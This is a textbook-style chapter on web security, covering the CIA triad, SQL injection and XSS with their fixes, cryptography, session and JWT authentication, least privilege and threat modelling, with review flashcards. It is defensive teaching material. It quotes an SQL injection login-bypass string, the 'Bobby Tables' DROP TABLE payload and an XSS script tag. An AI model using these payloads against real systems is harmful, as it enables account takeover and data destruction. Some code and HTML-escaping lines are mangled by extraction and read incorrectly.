Security is not a feature; it is a property of the entire system, and one that is far easier to lose than to retrofit. Two recent industry numbers make the case concrete: cyberattacks against organizations grew sharply year over year in 2024, and the average cost of a single data breach now sits around \$4.4 million per incident (IBM’s 2024 Cost of a Data Breach report). A breach is rarely just an embarrassing news cycle — it is also legal exposure, regulatory fines, customer churn, mandatory remediation, and, sometimes, the end of the company.
The discipline that keeps these failures out is security engineering. This chapter introduces the smallest set of ideas a software engineer needs to reason about whether an application is secure and what kind of failure it is when it isn’t: the CIA triad, the two most common web vulnerabilities (SQL injection and cross-site scripting), the cryptographic primitives every web app eventually leans on, authentication mechanisms, and a handful of design principles that shape secure systems regardless of language or framework. We close with a four-question template — security plan — for evaluating any system you build or inherit.
Two Stories That Frame the Chapter
Hollywood Presbyterian Medical Center, 2016. A ransomware infection encrypted the hospital’s files, taking the medical-records system offline. Staff resorted to fax machines and paper charts; some patients had to be diverted to other hospitals. The attackers demanded a ransom in Bitcoin; the hospital ultimately paid 40 BTC (about \$17,000 at the time) to restore access. No data was stolen. The harm was that legitimate users — doctors, nurses, the hospital itself — could no longer reach their own data and could no longer trust the data they did reach.
Equifax, 2017. Attackers exploited an unpatched vulnerability in Apache Struts (CVE-2017-5638) and exfiltrated the personal records of approximately 147 million Americans, including names, addresses, dates of birth, Social Security numbers, and driver’s license numbers. The total cost — settlements, regulatory fines, mandatory security upgrades — eventually exceeded \$1.38 billion. Nothing was deleted or encrypted. The harm was that highly sensitive data, which should never have left Equifax, was in the hands of strangers.
These two failures look superficially similar — both are “security incidents” — but they break the system in different ways, and a useful theory has to distinguish them. That theory is the CIA triad.
The CIA Triad: Three Security Attributes
Almost every security failure can be classified as a violation of one (or more) of three properties. Together they are known as the CIA triad.
Confidentiality
Sensitive data must be accessible to authorized users only.
A confidentiality failure is the system letting the wrong person read data they should not have seen. Equifax is the textbook case: the data itself was unchanged and still available — it had simply been read by people who had no business reading it. Other examples are leaked password databases, unencrypted health records on a stolen laptop, or a misconfigured cloud bucket that anyone on the internet can list.
Integrity
Sensitive data must be modifiable by authorized users only, and the system must keep it accurate, consistent, and trustworthy over its lifecycle.
An integrity failure is the system allowing the wrong change to be made. The Hollywood Presbyterian ransomware was an integrity failure as well as an availability one: the files on disk had been overwritten with attacker-controlled ciphertext. A more subtle integrity failure is a bank ledger where a row’s amount is silently mutated by an unauthorized SQL statement, or an audit log into which an attacker can write fake entries to cover their tracks.
Availability
Critical services must be available when needed by their legitimate clients.
An availability failure is the system being unable to serve requests that should succeed. Ransomware is one cause; a denial-of-service attack that floods the front door is another; a single power supply that takes the only data center offline is a third. The hospital was the textbook case here too — patient records existed, but doctors couldn’t get to them.
Why a Triad and not a Single Property
Different attacks violate different combinations of the three. Calling everything just “a security incident” obscures what went wrong and therefore what defense would have prevented it. Encryption protects confidentiality; cryptographic hashes and signatures protect integrity; redundancy and rate-limiting protect availability. You cannot pick the right defense without first identifying which property is at stake.
Incident
Confidentiality
Integrity
Availability
Equifax 2017 (data exfiltration)
✓ violated
—
—
Hollywood Presbyterian 2016 (ransomware)
—
✓ (files overwritten)
✓ (records inaccessible)
DDoS attack flooding a checkout API
—
—
✓
Stolen unencrypted laptop with PHI
✓
—
—
Forged transaction inserted into a bank ledger
—
✓
—
Quick Check. Cover the table above. For each scenario, which CIA letter(s) apply, and why? Spaced retrieval — recalling without looking — is what builds durable memory; re-reading merely feels like it does.
Common Web Vulnerabilities
Two vulnerabilities account for an outsized share of real-world web breaches: SQL injection and cross-site scripting. Both have the same underlying shape — user-supplied data is mistakenly treated as code by some downstream interpreter — and both are eradicated by the same conceptual fix: separate code from data.
SQL Injection (SQLi)
A login handler that builds its query by string concatenation looks innocent:
name=get_user_input("username")pass=get_user_input("userpassword")sql=('SELECT * FROM Users ''WHERE Name = "'+name+'"''AND Pass = "'+pass+'"')user=db.execute_query(sql)login(user)ifuserelseretry()
For a normal login (name = "Tobias", pass = "password1234"), the database sees:
— and returns the matching user (if any). But the user controls the contents of name and pass, and through string concatenation that means the user partially controls the query itself. An attacker submits:
""="" is unconditionally true, so the predicate reduces to Name = "Tobias" — and the attacker is logged in as Tobias without knowing the password. With more sophisticated payloads the attacker can read other tables, modify or delete data, and (under some configurations) execute commands on the database server.
Why SQL Injection Matters
SQL injection has been described in print for almost three decades — the first public write-up appeared in Phrack magazine in 1998 — and it remains one of the most common web vulnerabilities found in the wild. The OWASP Top 10 listed injection (a category dominated by SQLi) as the #1 web application security risk continuously from 2003 through 2017, and it was still in the top 3 in 2021. A non-exhaustive timeline:
1998 — SQL injection is first described publicly (Phrack #54, Rain Forest Puppy).
2003–2017 — OWASP ranks Injection as the #1 web-application security risk in every revision of its Top 10.
2011 — A SQL-injection-driven breach of Sony PlayStation Network compromises personal data of ~77 million users.
2023 — The MOVEit Transfer breach (CVE-2023-34362) — a SQLi vulnerability in a widely used file-transfer product — is exploited by the Cl0p ransomware group, affecting thousands of organizations and tens of millions of individuals.
If a vulnerability has been understood since 1998 and is still on every “top web vulnerabilities” list a quarter-century later, the explanation is not that the fix is hard — it is that the fix is not the default. Every team that hand-rolls a query is one tired afternoon away from concatenating user input into a SQL string.
The Fix: Prepared Statements / Parameterized Queries
Almost every modern database driver supports parameterized queries: the developer writes the query with placeholders, and the parameter values are sent separately, never inlined into the SQL text:
name=get_user_input("username")pass=get_user_input("userpassword")sql=('SELECT * FROM Users ''WHERE Name = @0 ''AND Pass = @1')user=db.execute_query(sql,name,pass)login(user)ifuserelseretry()
The placeholder syntax varies by driver (? in SQLite/MySQL, %s in psycopg, @0 / @1 in some Microsoft drivers, $1 / $2 in PostgreSQL’s native protocol), but the guarantee is the same: the database parses the SQL once, with the placeholders in place, and then binds the parameter values into the already-parsed query plan. The attacker’s " or ""=" payload now ends up as a literal string compared against Pass, never as additional SQL syntax.
Don’t roll your own escaping. A common (wrong) instinct is to “fix” SQLi by manually escaping quotes — replacing " with \", stripping semicolons, and so on. This loses to subtleties of every database’s quoting rules and is one Unicode normalization trick away from being bypassed. The correct fix is to never construct SQL by string concatenation in the first place — let the database do parameter binding.
Which CIA Properties Does SQLi Threaten?
Attribute
How SQLi can violate it
Confidentiality
Read sensitive data from any table the database role can see (SELECT * FROM Users and beyond).
Integrity
Modify, insert, or delete data (UPDATE Users SET role='admin' WHERE id=..., DROP TABLE, planted backdoor accounts).
Availability
Less common, but possible: dropping tables, deleting rows, or running expensive queries to exhaust the database.
The XKCD strip “Bobby Tables” — Robert’); DROP TABLE Students;– — captures both the integrity and availability failure mode in one panel. The '); closes the original INSERT statement, DROP TABLE Students; removes the entire student table, and -- comments out whatever the original query had after the value, so the database doesn’t choke on a trailing syntax error.
Cross-Site Scripting (XSS)
Suppose a social-media site renders user comments into the page like this (pseudo-HTML):
If the site renders the comment body by concatenating it into the HTML document, an attacker can post a comment whose body is:
<script>alert("USC IS BETTER!!!")</script>
When any other user’s browser fetches the page, that <script> tag is part of the document, so the browser executes it — believing it came from the trusted site. The alert box is harmless theatre; the real danger is that the script can read the victim’s cookies, session tokens, or DOM, and ship them off to an attacker-controlled server:
Because the script runs in the trusted site’s origin, the same-origin policy is no defense — to the browser, this script is no different from one the site itself shipped. The attacker has effectively borrowed the site’s identity inside every visiting user’s browser.
Two High-Profile XSS Incidents
2010 — Twitter’s onmouseover worm. Twitter’s tweet-rendering pipeline failed to escape an onmouseover= attribute. A self-replicating tweet caused users’ browsers to retweet the payload as soon as the user’s pointer passed over it. The worm propagated to hundreds of thousands of accounts in a few hours and was used both for pranks (rainbow text, pop-ups) and for redirecting users to malicious third-party sites.
2018 — British Airways breach. Attackers (associated with the Magecart group) injected a small JavaScript skimmer into the BA website. When customers entered their payment details, the script silently exfiltrated names, addresses, card numbers, and CVVs to an attacker-controlled domain. Hundreds of thousands of customers were affected; the UK Information Commissioner’s Office subsequently fined BA £20 million.
Which CIA Properties Does XSS Threaten?
Attribute
How XSS can violate it
Confidentiality
Read cookies, tokens, DOM contents, or anything the user can see in the browser, and exfiltrate them.
Integrity
Modify the rendered page, submit forms in the user’s name, post on their behalf, change settings.
Availability
Less common, but a runaway script can wedge or crash the user’s browser tab.
The Fix: Sanitize / Escape and Use a CSP
Defenses come in layers:
Output encoding (the primary fix). Wherever user input is rendered into HTML, escape the metacharacters (< → <, > → >, " → ", & → &) so the browser sees them as text rather than as tag boundaries. Modern templating engines (React’s JSX, Vue’s , Django templates, Jinja2) escape by default — bypassing them via dangerouslySetInnerHTML, v-html, mark_safe, or |safe is where XSS bugs are reintroduced.
Content Security Policy (a defense in depth). A Content-Security-Policy HTTP header tells the browser which sources of script it will execute — typically, only the site’s own origin and a small explicit allow-list. Even if attacker-supplied <script> slips through escaping, a strict CSP refuses to run it.
Use HttpOnly cookies for session tokens. A cookie with the HttpOnly flag is unreadable from JavaScript, so a successful XSS attack cannot directly steal the session token. (It can still abuse the session by issuing requests from the victim’s browser — see the authentication section below.)
Cryptography
Modern security depends on a small set of cryptographic primitives. You will rarely implement them yourself — the rule is don’t roll your own crypto — but you must understand what each one does and what it does not do, in order to use the libraries correctly.
Symmetric Encryption (e.g., AES)
In symmetric encryption, the same secret key is used to both encrypt and decrypt. Plaintext + key → ciphertext; ciphertext + key → plaintext. The most widely used algorithm today is AES (Advanced Encryption Standard), with 128-, 192-, or 256-bit keys.
Symmetric ciphers are fast and well-suited to bulk data — disk encryption, file encryption, the data channel of TLS sessions. Their fatal limitation is the key-distribution problem: the sender and receiver must somehow agree on the secret key without an attacker overhearing them. If they could already have a private channel for that, they would not need encryption.
Public-Key (Asymmetric) Cryptography (e.g., RSA)
Public-key cryptography solves the key-distribution problem. A key generator produces a pair of mathematically linked keys from a large random number:
The public key is published — anyone may have it.
The private key is kept secret by the owner — and only by the owner.
A message encrypted with one key of the pair can only be decrypted by the other key of the pair. From this single asymmetry, two crucial protocols fall out: encryption to a recipient and digital signatures.
Encrypting a Message to Bob
To send Bob a private message, Alice encrypts it with Bob’s public key. Anyone can do that — the public key is, well, public. But only Bob’s private key can decrypt the resulting ciphertext, so only Bob can read the message. No prior shared secret is required.
Digital Signatures
The reverse direction is just as useful. If Alice encrypts a document with her own private key, anyone can decrypt it (with her public key) — so the document is not secret. But because only Alice has her private key, the fact that the document decrypts cleanly with her public key proves she must have produced it. That proof is what a digital signature is.
In practice nobody encrypts the entire document — that would be slow and wasteful, since the goal is authenticity rather than secrecy. Instead, the signer:
Computes a cryptographic hash of the document (a short, fixed-length, collision-resistant fingerprint — SHA-256, for example).
Encrypts the hash with her private key. That encrypted hash is the signature.
Verification reverses the steps: anyone with the document, the signature, and the signer’s public key can decrypt the signature, recompute the hash from the document, and check that the two hashes match. If they do, the document has not been altered and it really came from the holder of the matching private key.
Why hash before signing? Public-key operations are roughly three orders of magnitude slower than hashing per byte, so signing a 1 MB document directly would be slow. Hashing first reduces every document to a 32-byte digest; the public-key operation then runs over those 32 bytes regardless of original document size. As a bonus, the hash’s collision-resistance means an attacker cannot forge a different document with the same signature.
Authentication
Authentication is the act of proving to a server that a request comes from a particular identified user. It looks deceptively trivial — “the user logs in, then makes requests” — but the question of what proof the client attaches to each subsequent request is where the design choices live. The naive answer is wrong; the better answers come with their own trade-offs.
Naive Approach: Send the Password Every Request
Don’t do this.
The most direct design is for the client to attach the username and password to every request, and the server to verify them every time:
@startuml
participant Client
participant Server
Client -> Server : Username, Password
Server --> Client : OK
Client -> Server : Request, Username, Password
Server --> Client : Reply
Client -> Server : Request, Username, Password
Server --> Client : Reply
@enduml
This works, but it is bad on two counts:
Slow. The server must verify the password (a deliberately slow hash like bcrypt or Argon2) on every request — adding tens of milliseconds of CPU per call.
Insecure. The client must keep the cleartext password in memory for the lifetime of the session, raising the blast radius of any client-side compromise. Every request is also a fresh chance for the password to leak in a log file, a proxy header, or a debug trace.
We need a way to prove identity without re-sending the password every time.
Session-Based Authentication (Session Cookies)
The standard fix is to authenticate once with username and password, and then issue the client a short-lived session ID — a random, opaque string that the server remembers alongside which user it represents.
@startuml
participant Client
participant Server
Client -> Server : Username, Password
Server --> Client : Set-Cookie: SessionID
Client -> Server : Request + Cookie(SessionID)
Server --> Client : Reply
Client -> Server : Request + Cookie(SessionID)
Server --> Client : Reply
@enduml
The session ID is stored client-side in a cookie that the browser automatically attaches to every subsequent request to the same domain. On each request, the server looks up the session ID in its own session store, finds the associated user, and serves the request as that user.
Important cookie flags. Three attributes harden a session cookie significantly:
HttpOnly — the cookie is not readable from JavaScript. A successful XSS attack therefore cannot exfiltrate the raw session ID.
Secure — the cookie is only sent over HTTPS. It cannot be sniffed off plain-HTTP networks.
SameSite=Strict (or Lax) — the cookie is not attached to cross-site requests. This is the primary defense against cross-site request forgery (CSRF), where a malicious page tries to issue an authenticated request from the victim’s browser.
Trade-offs.
Fast. Looking up a session ID is much cheaper than re-verifying a password.
Stateful. The server must keep a session store (in memory, in Redis, in a DB), which is a moving part to operate and a complication when scaling out.
Somewhat secure. Sessions can be made short-lived and explicitly invalidated on logout.
Still vulnerable to session-riding via XSS. Even with HttpOnly, a script running on the trusted page can issue authenticated fetch requests through the browser — the browser will dutifully attach the cookie. HttpOnly prevents theft of the session ID, not use of the session.
Authentication via JSON Web Tokens (JWT)
A JSON Web Token (JWT) sidesteps the server-side session store. After successful login, the server hands the client a small encoded JSON document — typically containing { "sub": "<user-id>", "exp": <expiry timestamp>, ... } — and digitally signs it with the server’s private (or symmetric) signing key.
@startuml
participant Client
participant Server
Client -> Server : Username, Password
Server --> Client : JWT (signed)
Client -> Server : Request + JWT
Server --> Client : Reply
Client -> Server : Request + JWT
Server --> Client : Reply
@enduml
The client attaches the JWT to every subsequent request — typically in an Authorization: Bearer <jwt> header, or in a cookie. The server verifies the signature with its own key and trusts the claims inside without any database lookup. There is no server-side session store to consult — the JWT is the session, and the signature is what makes it forgery-proof.
Trade-offs.
Stateless on the server. No session store; horizontal scaling is easier.
Fast. Verifying a signature is typically faster than a database round-trip to a session table.
Hard to revoke before expiry. Because the server keeps no record of “valid” tokens, a stolen JWT remains usable until its exp time is reached. Standard mitigations are short expiries (15 minutes is common) plus a longer-lived refresh token that is tracked server-side.
Same XSS exposure as session cookies, plus more. If the JWT is stored in localStorage (a common, lazy choice) it is directly readable by any script in the page — XSS exfiltrates the token outright. Storing the JWT in an HttpOnly + SameSite=Strict cookie reduces this to roughly the session-cookie risk profile.
Picking Between the Two
The choice is rarely a slam dunk. As a starting point:
Server-rendered web app, single backend, moderate scale. Session cookies (with HttpOnly, Secure, SameSite=Strict). Boring, well-understood, easy to revoke.
Many distinct services share authentication, or you are building a public API consumed by mobile clients. JWTs (signed, short-lived, paired with refresh tokens) work well — they don’t require every service to talk to a shared session store.
Either way: put the credential behind HttpOnly cookies if at all possible, never embed it in URLs, and never rely on the user’s browser keeping localStorage confidential.
Security Design Principles
Beyond specific vulnerabilities and primitives, security engineering is shaped by a small set of principles that have held up across decades of practice. Three are especially load-bearing for application developers.
Zero Trust Principle
Users and devices should not be trusted by default. Any input may be malicious, so every input must be sanitized.
The traditional (“perimeter”) model assumed that anything inside the corporate network was trustworthy and only outside traffic needed scrutiny. That assumption fails against insider threats, compromised internal hosts, supply-chain attacks, and the simple fact that modern apps span multiple networks. Zero Trust flips it: every request, no matter where it originates, is authenticated and authorized; every input, no matter where it comes from, is treated as potentially hostile until validated.
For an application developer, the operational consequence is that the trust boundary — the line between “I have to defend against this” and “I can rely on this” — should be drawn very tightly. Inputs from end users, third-party APIs, file uploads, configuration files, and even other internal services should all be validated at the boundary they cross into your code.
Open Design (vs. Security Through Obscurity)
Attackers should not be able to break into a system simply by understanding how it works. Use robust, public security mechanisms.
Security through obscurity is the temptation to keep a system secure by hiding how it works — a hidden URL, a custom-rolled hash, an unpublished port. The metaphor in the lecture is hiding the house key in a flowerpot: as soon as someone notices the flowerpot, the entire defense collapses.
The opposing principle is Open Design: the security of the system must rest on something that stays secret even when the design is public — typically a key, a password, or a private credential. AES, RSA, and TLS are all openly published; their security depends on key secrecy, not algorithm secrecy. This openness is a feature — the global security community has reviewed, attacked, and stress-tested these designs for decades, and weaknesses have been found and fixed publicly.
Obscurity is not useless — it is just not a foundation. Hiding implementation details (which version of which framework you run, which port management endpoints listen on) is a reasonable complementary layer that makes known vulnerabilities slower to find. Use it on top of strong, openly designed mechanisms — never instead of them. The rule of thumb:
When proposing a new security approach or algorithm: insist on public scrutiny — expose the design to the security community.
When deploying an existing, scrutinized technology in a real product: add complementary obscurity on top — hide your version numbers and configuration to slow down opportunistic attackers.
Principle of Least Privilege
Every program and every privileged user of the system should operate using the least set of privileges necessary to complete the job.
Originally formulated by Saltzer and Schroeder in 1975, the Principle of Least Privilege (sometimes called Least Authority or Minimal Privilege) is a strategy for shrinking the blast radius of an inevitable compromise. If every component runs with full permissions, the first foothold an attacker gets is also the last one they need; if every component runs with only what it requires, the foothold is contained.
A concrete application is to split a monolithic app into separate components, each with just the permissions it needs:
@startuml
component ProductDisplay
component EmailNotification
component ImageUpload
component SystemBackup
note bottom of ProductDisplay
Read-only access to
Products table
end note
note bottom of EmailNotification
Send-only access to
email API; no DB access
end note
note bottom of ImageUpload
Write-only access to
/uploads bucket; no delete
end note
note bottom of SystemBackup
Read-only access to FS/DB;
write only to backup bucket
end note
@enduml
If an attacker compromises the product display service, they cannot send phishing email to the user base, cannot upload arbitrary files, and cannot exfiltrate the entire database — those capabilities live in other processes with other credentials. The attack still hurts, but it does not become a company-ending event.
Cloud IAM systems (AWS IAM, GCP IAM, Kubernetes RBAC) are designed around this principle: every service, container, or human user gets a role that grants the narrowest set of capabilities that lets the role do its job. The opposite anti-pattern — running every service as the database owner with full network egress — is one of the single most common findings in real security audits.
Building a Security Plan
Knowing individual attacks and defenses is necessary but not sufficient. To reason about a whole system, security engineers use a four-question template. Walk through these for any system you build or inherit.
#
Question
What you produce
1
Security model.What are you defending?
A list of the assets that matter — data, services, secrets, reputation.
2
Threat model.Who might be attacking, and what are they trying to achieve?
A description of plausible adversaries and their goals.
3
Attack surface.Which parts of the system are exposed to an attacker?
An inventory of the inputs, endpoints, ports, and side channels an attacker can reach.
4
Protection mechanisms.How do we prevent (or detect) compromise?
The concrete defenses — input validation, encryption, authentication, monitoring — and which threats they address.
Building a Threat Model: Knowledge, Actions, Resources, Incentive
A threat model is not “attackers are bad and want bad things”. It is a structured description of what kind of attacker you are defending against. The lecture distinguishes four dimensions:
Knowledge. What does the attacker already know about the system? (Public docs only? Stolen source code? An insider with credentials?)
Actions. What can the attacker actually do? (Send web requests? Run code on a guest VM? Tap the network? Bribe an employee?)
Resources. How much time, money, and infrastructure can they spend? (A bored teenager? A criminal cartel? A nation-state intelligence service?)
Incentive.Why do they want to compromise the system? (Financial gain? Ideological? Espionage? Vandalism?)
Different threat models warrant different defenses. A consumer mobile app and a defense contractor’s internal collaboration tool may use the same primitives (TLS, authentication, encryption at rest), but the strength and layering of those primitives — and the response cost they justify — differ by orders of magnitude.
Why a Wrong Threat Model Hurts
A widely circulated photograph shows an emergency telephone whose buttons are blocked by an aluminum foil cover with cutouts for “9” and “1” — meant to enforce “only 9-1-1 can be dialed”. Two things are wrong with the design:
Wrong threat model. Any phone number that contains only the digits 9 and 1 (e.g. 911-1119) can still be dialed. The cover assumed attackers would only press one digit at a time.
Larger-than-expected attack surface. The foil itself can be pushed sideways or torn, exposing the buttons underneath.
The lesson generalizes: a defense that doesn’t match the actual threat model and doesn’t account for the real attack surface fails for both reasons. Always do the four-question pass on the system as deployed, not the system as drawn on the whiteboard.
Quick Check. Pick a real application you use daily. Walk through the four questions: what is it defending, who attacks it, what is exposed, what defenses are in place? Where are the weakest links?
Summary
The CIA triad classifies security goals into three properties: Confidentiality (only authorized users can read), Integrity (only authorized users can modify), and Availability (the system serves legitimate clients when needed). Every breach is a violation of one or more of these.
SQL injection (SQLi) treats user-supplied strings as SQL code by string-concatenating them into queries. The fix is prepared statements / parameterized queries, which let the database parse the SQL once and bind values separately. Don’t roll your own escaping.
Cross-site scripting (XSS) treats user-supplied strings as HTML/JavaScript by interpolating them into pages. The fix is output encoding in the templating layer, defended in depth by a strict Content Security Policy and HttpOnly cookies for session credentials.
Symmetric encryption (AES) uses one shared key — fast, but suffers from the key-distribution problem. Public-key cryptography (RSA) uses a public/private key pair, enabling private messaging and digital signatures without prior shared secrets. Digital signatures are produced by encrypting the hash of a document with the signer’s private key.
Authentication must avoid sending the password on every request. Session cookies delegate to a server-side store and need HttpOnly + Secure + SameSite. JWTs are signed, stateless tokens — easier to scale across services, harder to revoke, and dangerous if stored in localStorage (XSS readable).
Three security design principles dominate application code: Zero Trust (validate every input, regardless of source), Open Design (security rests on key secrecy, not algorithm secrecy — public scrutiny improves designs), and Principle of Least Privilege (every component holds only the permissions its job requires, shrinking the blast radius of any compromise).
A security plan answers four questions: what are you defending (security model), who is attacking and why (threat model), where is the system exposed (attack surface), and what mechanisms prevent compromise (protection mechanisms). A defense built without a matching threat model fails — the foil-and-emergency-phone is the canonical illustration.
Quiz
Security and Authentication Flashcards
Retrieval practice for the CIA triad, SQL injection, XSS, cryptography (symmetric, public-key, signatures), authentication (sessions, JWT), and security design principles.
Difficulty:Basic
What are the three security attributes named by the CIA triad, and what does each one mean in one sentence?
Confidentiality — sensitive data is accessible to authorized users only. Integrity — sensitive data can be modified by authorized users only, and stays accurate, consistent, and trustworthy over its lifecycle. Availability — critical services are reachable when legitimate clients need them.
Almost every security failure is a violation of one or more of these three. Calling everything ‘a security incident’ obscures what went wrong; CIA gives you the vocabulary to be specific.
Difficulty:Basic
A laptop containing unencrypted patient health records is stolen. Which CIA property is violated?
Confidentiality — sensitive data is now accessible to whoever holds the laptop, who is not an authorized user. Integrity and Availability are not affected on the original system.
Disk encryption (e.g., FileVault, BitLocker, LUKS) is the standard countermeasure: a stolen disk reveals only ciphertext that the attacker cannot decrypt without the key.
Difficulty:Intermediate
A ransomware attack encrypts the only copy of a database. Which CIA properties are violated?
Integrity — the on-disk bytes have been overwritten with attacker-controlled ciphertext, an unauthorized modification. Availability — the legitimate users can no longer read their data. (Pure ransomware does not violate Confidentiality; modern ‘double-extortion’ ransomware that also exfiltrates would add a confidentiality violation.)
The standard countermeasures are backups (restore from before the attack) and least-privilege filesystem permissions (so a single compromised process can’t rewrite everything).
Difficulty:Basic
What is SQL injection in one sentence, and what is its underlying cause?
SQL injection is an attack where user-supplied input is concatenated into a SQL query string and ends up being interpreted as SQL syntax instead of as a value. The underlying cause is mixing code and data — the database’s parser cannot tell which characters came from the developer’s query template and which came from the user.
Every web vulnerability whose name contains ‘injection’ (SQL injection, command injection, LDAP injection, NoSQL injection) shares this same root cause.
Difficulty:Intermediate
What is the standard fix for SQL injection, and why does it work?
Use parameterized queries / prepared statements: write the SQL with placeholders (?, @0, $1, …) and pass the values as separate arguments to the database driver. This works because the database parses the SQL once with the placeholders in place before the values are ever attached, so the values cannot grow new SQL syntax — they are bound into an already-parsed query plan as pure data.
Manual escaping is a fragile, error-prone alternative — it loses to subtleties of every database’s quoting rules and to Unicode normalization tricks. Don’t roll your own escaping.
Difficulty:Intermediate
Which CIA properties can a successful SQL injection attack violate?
All three: Confidentiality (read sensitive rows from any table the connection can see), Integrity (modify, insert, or delete data — UPDATE … SET role='admin', INSERT a backdoor account, DROP TABLE), and Availability (less common, but possible — drop tables, delete rows, or run very expensive queries to exhaust the database).
SQLi is one of the few vulnerabilities that can hit all three CIA properties at once, which is part of why it has stayed so high on the OWASP Top 10 for so long.
Difficulty:Basic
What is cross-site scripting (XSS), and what is the underlying cause?
XSS is an attack where user-supplied content is interpolated into an HTML page and ends up being interpreted by the browser as HTML/JavaScript. The underlying cause is the same as SQLi — mixing code and data — but the downstream interpreter is the browser, not the database. The injected script runs in the trusted site’s origin, so it can read cookies, the DOM, and issue authenticated requests.
SQLi: code-vs-data confusion in the database. XSS: code-vs-data confusion in the browser. Same underlying shape, different victim, different defenses.
Difficulty:Intermediate
What are the main defenses against XSS?
(1) Output encoding — escape HTML metacharacters (< → <, > → >, " → ", & → &) when rendering user content. Modern templating engines (React JSX, Vue {{ }}, Django, Jinja2) escape by default. (2) Content Security Policy (CSP) — an HTTP header that restricts which script sources the browser will execute, defending in depth even if encoding fails. (3) HttpOnly cookies for session tokens — so a successful XSS cannot directly read the token.
Escaping is the foundation; CSP and HttpOnly are layers on top. Most XSS bugs in the wild come from explicitly bypassing the templating engine’s default escaping (dangerouslySetInnerHTML, mark_safe, |safe, v-html).
Difficulty:Intermediate
Which CIA properties does a successful XSS attack typically violate?
Confidentiality (script reads cookies, tokens, DOM contents, and exfiltrates them) and Integrity (script modifies the page, submits forms in the victim’s name, posts on their behalf, changes settings). Availability violations are possible (a runaway script can wedge a browser tab) but uncommon in practice.
The reason XSS matters so much in the real world is that the attacker borrows the trusted site’s identity in the victim’s browser — the same-origin policy is no defense against a script that the trusted page itself appears to ship.
Difficulty:Basic
Define symmetric encryption, name a common algorithm, and state its main weakness.
Symmetric encryption uses the same secret key to both encrypt and decrypt. The most widely used algorithm today is AES (with 128-, 192-, or 256-bit keys). Symmetric ciphers are fast and well-suited to bulk data, but their main weakness is the key-distribution problem: sender and receiver must agree on the key without an attacker overhearing — and if they had a private channel for that, they would not need encryption.
Symmetric encryption is what TLS uses for the bulk data channel after the handshake. The handshake itself uses public-key cryptography to establish the symmetric key — combining the two solves the key-distribution problem.
Difficulty:Basic
Define public-key (asymmetric) cryptography, and explain how it solves the key-distribution problem.
Public-key cryptography generates a pair of mathematically linked keys: a public key that anyone may have, and a private key kept secret by the owner. A message encrypted with one key of the pair can only be decrypted by the other key. To send Alice a private message, Bob encrypts with Alice’s public key — only her private key can decrypt it. No prior shared secret is needed; Alice’s public key can be published freely.
RSA, ECC (elliptic-curve), and Diffie-Hellman are the standard families. Public-key operations are slow per byte, so they are typically used to negotiate a symmetric key that does the bulk encryption — the design at the heart of TLS.
Difficulty:Basic
Alice wants to send Bob a private message using public-key cryptography. Which key does she use to encrypt?
Bob’s public key. Anyone may have it, so Alice can use it without prior secret sharing — but only Bob’s matching private key (which only Bob holds) can decrypt the resulting ciphertext.
Common confusion: students reach for Alice’s private key by analogy with signatures. That direction (encrypt with one’s own private key) is what produces a signature, not a private message — anyone with Alice’s public key could decrypt it, so the contents are not secret.
Difficulty:Intermediate
What is a digital signature, and how does it work?
A digital signature proves that a document was produced by the holder of a particular private key, and that the document has not been altered. The signer (1) computes a cryptographic hash of the document (SHA-256, e.g.); (2) encrypts the hash with their private key — that encrypted hash is the signature. To verify, anyone with the document, the signature, and the signer’s public key decrypts the signature, recomputes the hash from the document, and checks the two match.
Signatures provide integrity and authenticity — they do not provide confidentiality (the document is sent in the clear next to its signature). For both confidentiality and authenticity, encrypt-then-sign or sign-then-encrypt — there are subtle ordering issues; libraries like libsodium handle this for you.
Difficulty:Intermediate
Why do digital signature schemes hash the document first, instead of encrypting the whole document with the private key?
Performance. Public-key operations are roughly three orders of magnitude slower per byte than a fast hash like SHA-256. Hashing reduces every document — regardless of size — to a fixed-length digest (32 bytes for SHA-256), so the slow public-key operation runs over those 32 bytes instead of the whole document. The hash’s collision-resistance also means an attacker cannot construct a different document with the same hash and therefore the same signature.
Without hashing, signing a 1 GB file would require running RSA over a gigabyte of data. With hashing, RSA still runs over 32 bytes — independent of the file’s size.
Difficulty:Intermediate
Why is sending the username and password on every request a bad authentication design?
(1) Slow — the server must verify the password (with a deliberately slow hash like bcrypt or Argon2) on every request, adding tens of milliseconds of CPU per call. (2) Insecure — the cleartext password lives in the client’s memory for the lifetime of the session and crosses the network on every request, multiplying the chances of leaking via a log file, debug trace, or proxy header.
The standard fix is to authenticate once with username and password and then issue a short-lived token (session ID or JWT) that rides on subsequent requests. The expensive password check happens once; the cheap token check happens on every call.
Difficulty:Intermediate
How does session-based authentication (with a session cookie) work, and what are the three cookie flags that harden it?
After successful login, the server generates a random opaque session ID mapping to the user, stores it in a server-side session store, and returns it to the client in a cookie. The browser automatically attaches the cookie to every subsequent request to the same domain. Three hardening flags: HttpOnly (cookie not readable from JavaScript), Secure (cookie only sent over HTTPS), SameSite=Strict or Lax (cookie not attached to cross-site requests, defending against CSRF).
Sessions are stateful (the server keeps a session store) but easy to revoke — invalidate the row in the store and the session is dead immediately.
Difficulty:Intermediate
What is a JSON Web Token (JWT), and how does it differ from a session cookie?
A JWT is a small encoded JSON document — typically { sub: <user-id>, exp: <expiry>, … } — digitally signed by the server’s key. The client attaches it to every request (in an Authorization: Bearer … header or in a cookie). The server verifies the signature with its own key and trusts the claims without consulting any database. Unlike a session cookie, there is no server-side session store; the JWT is the session, and the signature is what makes it forgery-proof.
Statelessness is the JWT win (no shared session store; easier horizontal scaling). The price is harder revocation — without a session store, a stolen JWT remains usable until its exp time.
Difficulty:Advanced
What are the trade-offs between session cookies and JWTs?
Session cookies: stateful (need a session store), easy to revoke (delete the row), simple. JWTs: stateless on the server (no session store; easier horizontal scaling), but harder to revoke (a stolen JWT stays usable until exp). Both are vulnerable to XSS-driven session-riding; both should be served only over TLS. JWTs in localStorage are XSS-readable (avoid). JWTs in HttpOnly + SameSite cookies match the session-cookie security profile.
Standard production pattern for JWTs: short access-token expiry (5–15 min) plus a longer-lived refresh token tracked server-side. The refresh token gives you back a revocation lever; the short access-token expiry bounds the damage of a leak.
Difficulty:Advanced
Does the HttpOnly cookie flag fully protect a session against XSS? Explain.
No.HttpOnly prevents JavaScript from reading the cookie, so a successful XSS attack cannot directly exfiltrate the session token. But the script can still use the session: any fetch('/api/...', { credentials: 'include' }) call will have the cookie attached automatically by the browser, so the attacker rides the session in the victim’s browser without ever touching the raw token. This is sometimes called session-riding.
